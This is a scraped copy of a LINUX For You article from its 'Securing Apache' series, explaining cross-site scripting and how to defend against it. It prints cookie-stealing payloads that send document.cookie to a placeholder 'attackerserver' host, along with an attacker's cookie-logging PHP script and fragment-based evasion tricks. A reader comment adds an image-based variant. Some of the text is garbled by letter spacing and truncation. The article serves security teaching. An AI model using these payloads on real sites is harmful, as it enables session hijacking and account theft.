Escolar Documentos
Profissional Documentos
Cultura Documentos
Submit Tips
Search
HOME
REVIEWS
HOW-TOS
CODING
INTERVIEWS
FEATURES
OVERVIEW
BLOGS
SERIES
IT ADMIN
Search for:
Search
Get Connected
In the previous article in this series, we started our journey to a secured Apache by dissecting its internals. We then looked at various attacks against Web applications via injection flaws, beginning with SQL injection. In this article, we will deal with another category of injection flaws: Cross-Site Scripting, a.k.a. XSS. I would like to reiterate here that neither I nor LFY aim to teach readers to attack servers; this is meant to give you the knowledge that you need to protect your own infrastructure.
Grabbing second position in OWASPs latest Top Ten critical Web application security risks after SQL injection flaws is XSS. (By the way, the different first letter is used to avoid confusion with CSS Cascading Style Sheets.) The security consortium says that XSS accounts for about 39 per cent of vulnerabilities in Web applications.
RSS Feed
So what is XSS?
OWASP defines XSS as a flaw that occurs when an application includes user-supplied data in a page sent back to the browser, without properly validating or escaping that data. XSS attacks are essentially code-injection attacks, which exploit the interpretation process of the Web application in the browser. These attacks are carried out mainly on online message boards, blogs, guest books, and user forums (collectively called boards, in the rest of the article), where messages are permanently stored. They are created using HTML, JavaScript, VBScript, ActiveX, Flash, and other client-side scripting technologies. The goal of an XSS attack is to steal client authentication cookies, and any other sensitive information that can authenticate the client to the website. With a captured (legitimate) user token, an attacker can impersonate the user, leading to identity theft. Unlike most attacks, which involve two parties (the attacker and the website, or the attacker and the victim/client), the XSS attack involves three parties: the attacker, the victim/client, and the website. An XSS attack tricks a legitimate user by posting a message to the board with a link to a seemingly harmless site, which subtly encodes a script that attacks the users once they click the link. This seemingly harmless website can be (and is, in many cases) a phishing clone of a page in the original website the user is browsing; it may prompt users for their username and password. Alternately, it may be just a thank you page, which steals the users cookies in the
Follow
+2,512
Find us on Facebook
Comments
Tag cloud
Once the page containing this code is accessed, the variable sent via the GET method (a.k.a. querystring) is output directly to the page that PHP is rendering. If you pass legitimate data (for example, the string Arpit Bajpai) as an argument, the URL would be something like h t t p : / / l o c a l h o s t / h e l l o . p h p ? n a m e = A r p i t % 2 0 B a j p a i(assuming youre running the server locally on your system, which you should be if you are trying this out). The output of this is harmless, as shown in Figure 1.
The result is shown in Figure 2. It still looks relatively innocuous, but the fact that the input is not validated by the PHP script before outputting it to the victims Web browser opens the way for more harmful HTML to be included into the vulnerable page.
As in most cases, the main aim of an XSS attack is to steal the users authentication cookie. Shown below is a typical XSS attack attempt that has been done by posting malicious JavaScript to an online message board, and grabbing the users cookie.
< s c r i p t > d o c u m e n t . l o c a t i o n = " h t t p : / / a t t a c k e r s e r v e r / c o o k i e . p h p ? c = " + d o c u m e n t . c o o k i e < / s c r i p t >
When victims click on the link containing this malicious code, they might get redirected to the home page, but their cookies will be sent to the c o o k i e . p h pcookie fetcher PHP script on the attackers server. A typical cookie fetcher script might look like whats shown below:
< ? p h p $ c o o k i e=$ _ G E T [ ' c ' ] ; $ i p=g e t e n v( ' R E M O T E _ A D D R ' ) ; $ d a t e = d a t e ( " jF ,Y ,g : ia " ) ; ; $ r e f e r e r = g e t e n v( ' H T T P _ R E F E R E R ' ) ; $ f p=f o p e n ( ' c o o k i e s . h t m l ' ,' a ' ) ; f w r i t e ( $ f p ,' C o o k i e :' . $ c o o k i e . ' < b r >I P :' . $ i p . ' < b r >D a t ea n dT i m e : ' . $ d a t e . ' < b r >R e f e r e r :' . $ r e f e r e r . ' < b r > < b r > < b r > ' ) ; f c l o s e ( $ f p ) ; h e a d e r( " L o c a t i o n :h t t p : / / w w w . v u l n e r a b l e s i t e . c o m " ) ; ? > < H T M L > < / H T M L >
This file will retrieve the cookies and append them to a c o o k i e . h t m lfile on the attackers server. Other details saved at the same time include the IP address of the victims Net connection, the date and time at which the cookie was fetched, and the HTTP referrer i.e., the site on which the victim clicked the malicious link to the attackers c o o k i e . p h p . With this information, the attacker can then connect to the board website, supplying the captured cookie, and thus pretending to be the victim user. Now, most savvy victims get suspicious when they are redirected to the home page, or see something unusual, which is not part of the Web applications normal execution. For such victims, attackers mostly prefer using IFRAMEs in their attack script, like whats shown below:
< i f r a m ef r a m e b o r d e r = 0h e i g h t = 0w i d t h = 0s r c = j a v a s c r i p t : v o i d ( d o c u m e n t . l o c a t i o n = h t t p : / / a t t a c k e r s e r v e r / c o o k i e . p h p ? c = + d o c u m e n t . c o o k i e ) > < /
When victims click the message with the above script in the body, they will experience nothing unusual in the applications normal behaviour yet, their cookies will be sent to c o o k i e . p h pon the attackers server. This is how a typical XSS attack is done.
The procedure is that the attacker first injects a malicious script through an input Web form. This
is then stored by the server in its database. When any user requests the page, the malicious script is rendered into it. Anyone who clicks the link (or merely views the message, in case of the IFRAME-based attack) becomes a victim, as the malicious script is executed in the victims browser, passing the authentication cookies back to the attacker. This type of vulnerability is very effective, since the attacker can target several users of the server whoever clicks on the link or message.
Clicking this link will cause the victims browser to pop up an alert box showing their current set of cookies. This particular example is harmless; an attacker can do much more damage, including stealing passwords, resetting the victims home page, or redirecting the victim to another website, by using modified JavaScript code. A visualisation of an attack using a reflected vulnerability is shown in Figure 4.
Now, embedding such bulky scripts might draw the victims attention, so attackers simply convert these into hexadecimal format using one of the many converters available, such as
h t t p : / / c o d e . c s i d e . c o m / 3 r d p a g e / u s / u r l / c o n v e r t e r . h t m l . Moreover, if the malicious
script is quite big, then URL-shortening services like Tiny URL are used to create a short URL that maps to the long one.
Normally, the code in this page would welcome the user, if invoked with the following URL:
h t t p : / / w w w . e x a m p l e . c o m / w e l c o m e . h t m l ? n a m e = J o e
However, a little tampering with this URL results in displaying the users cookies in their browser, if they click the URL hyperlink: h t t p : / / w w w . e x a m p l e . c o m / w e l c o m e . h t m l ? n a m e =
< s c r i p t > a l e r t ( d o c u m e n t . c o o k i e ) < / s c r i p t >
What happens is that to open this URL, the victims browser sends an HTTP request to
w w w . e x a m p l e . c o m . It receives the above (static) HTML page. The victims browser then starts
parsing this HTML into DOM. In this case, the code references d o c u m e n t . U R L , and so, a part of this string is embedded at parsing time in the HTML. It is then immediately parsed, and the malicious JavaScript code passed through the URL is executed in the context of the same page, resulting in an XSS attack. You might realise here that the payload did arrive at the server (in the query part of the HTTP request), and so it could be detected just like any other XSS attack but attackers even take care of that with something like the following:
h t t p : / / w w w . e x a m p l e . c o m / w e l c o m e . h t m l # n a m e = < s c r i p t > a l e r t ( d o c u m e n t . c o o k i e ) < s c r i p t >
Notice the hash sign (# ) used here; it tells the browser that everything beyond it is a fragment, and not part of the query. IE (6.0) and Mozilla do not send the fragment to the server, and for these browsers, the server would only see h t t p : / / w w w . e x a m p l e . c o m / w e l c o m e . h t m l , with the payload remaining hidden.
XSS Shell
The XSS Shell is a tool that can be used to set up an XSS channel between a victim and an attacker, so that an attacker can control a victims browser, sending it commands. The communication is bi-directional.
XSS Tunnel
This is a GPL-licensed open source application written in .NET, and is the standard HTTP proxy which sits on an attackers system. It enables tunnelling of HTTP traffic through an XSS channel, to use virtually any application that supports HTTP proxies.
ordered to send spam mails, harvest information such as license keys or banking data on compromised machines; or launch distributed denial-of-service (DDoS) attacks against arbitrary targets.
For developers
The best way to check your website for vulnerabilities is to run a Web application security scan against a local copy of it. The best FOSS project available for this is Nikto. The next preferred option is to properly escape all untrustworthy data, based on the HTML context (body, attribute, JavaScript, CSS, or URL) that the data will be placed into. Developers need to include this escaping in their applications. See the OWASP XSS Prevention Cheat Sheet for more information about data escaping techniques. Filtering script output can also defeat XSS vulnerabilities by preventing them from being transmitted to users. When filtering dynamic content, select the set of characters that is known to be safe, instead of trying to exclude the set of characters that might be bad. This is preferable because its unclear whether there could be any other characters or character combinations that can be used to expose other vulnerabilities. Check all headers, cookies, query strings, form and hidden fields, and all other parameters against tags such as < s c r i p t > ,< o b j e c t > ,< a p p l e t > ,< f o r m > , and < e m b e d > . Also, do not echo any input value without validation. Do not store plain-text or weakly encrypted passwords/contents in a cookie. Merely hashing the password with MD5 is not strong, since they are just 16 bytes in length, and hence can easily be deciphered with a brute-force method. If possible/practicable, the cookies authentication credentials should be associated with a source IP address. Discovering the same cookie coming from different IPs should raise a red flag. If possible, eliminate single sign-on, and apply password re-verification to avoid session takeover attacks. An attack against a site running with single sign-on has a better chance of being executed without the user noticing. Using free hosting sites is an essential building block in the attackers scheme. Free hosting sites
need to be more vigilant about who uses their services, and enterprises should consider blacklisting suspicious IP addresses. Also, if people host scripts like cookie fetchers, they should be monitored for illegal activities on the site. Cookies sent over HTTP(S) cannot be accessed by script via d o c u m e n t . c o o k i eso try sending cookies over HTTPS only. Also, try using the POST method for form submissions, instead of GET.
Resources
Meta-Information Cross Site Scripting [PDF] xssed.com is one of the best resources for XSS information Syngresss XSS Attacks Cross Site Scripting Exploits and Defense by Jeremiah Grossman, Robert Rsnake Hansen and others, is a must-read for those who are really interested.
Related Posts:
Securing Apache, Part 4: Cross-site Tracing (XST) & Cross-site History Manipulation (XSHM) Securing Apache, Part 5: HTTP Message Architecture Securing Apache, Part 3: Cross-Site Request Forgery Attacks (XSRF) Securing Apache, Part 6: Attacks on Session Management Cyber Attacks Explained: Web Exploitation
Tags: ActiveX, Apache, attacker, client authentication, client side scripting, Cross-Site Scripting, DOM, dos attacks, dynamic content, Flash, Google, html, identity theft, JavaScript, legitimate user, LFY September 2010, malicious code, malicious software, MD5, mozilla, mozilla firefox, netcraft, owasp, PHP, Securing Apache series, Security, security risks, SQL, SQL injection, URL, VBScript, vulnerabilities, web application security, web applications, Web browser, XSS
Previous Post
Next Post
What's this?
Pastor Reveals 7 Shocking Biblical Truths on Investing Moneynews Don't Let Your Kids Read This: Paying Teens for Citi Women & Co. VIDEO: Swimsuits You Can't Resist
DailyCandy
India has immense under-utilised talent in the cloud 42 comments Getting Your First Job Code Sport
1 comment 1 comment
Share
E rlend
how we can tweak webserver like Apache to prevent this kind of attack to a perticular extend?
Reply
Share
2 years ago
This is a really good post. A couple of comments. Cookies are often stolen using javascript images: var img = new Image(); img.src = "http://attackerserver/cookie.php? c="+document.cookie When using an image like this, there is nothing at all displayed in the page. I would also argue that XSS is very often used to inject malware into the browser and taking over the victims computer. Imho it's used more often for this purpose, than stealing cookies. Also properly encoding output according to the OWASP cheat sheet as you are writing the application should be the preferred solution. It's better to fix the flaws while you are writing the code, instead of trying to find and patch them later. Scanners rarely or never find all flaws, unfortunately.
Reply Share
C o m m e n t fe e d
Su b s cri b e vi a e m a i l
Reviews
How-Tos
Coding
Interviews
Features
Overview
Blogs
Search
Popular tags
Linux , ubuntu, Java, MySQL, Google, python, Fedora, Android, PHP, C, html, w eb applications , India, Microsoft, unix , Window s , Red Hat, Oracle, Security , Apache, xml, LFY April 2012, FOSS, GNOME, http, JavaScript, LFY June 2011, open source, RAM, operating systems
All published articles are released under Creative Commons Attribution-NonCommercial 3.0 Unported License, unless otherw ise noted. LINUX For You is pow ered by WordPress, w hich gladly sits on top of a CentOS-based LEMP stack.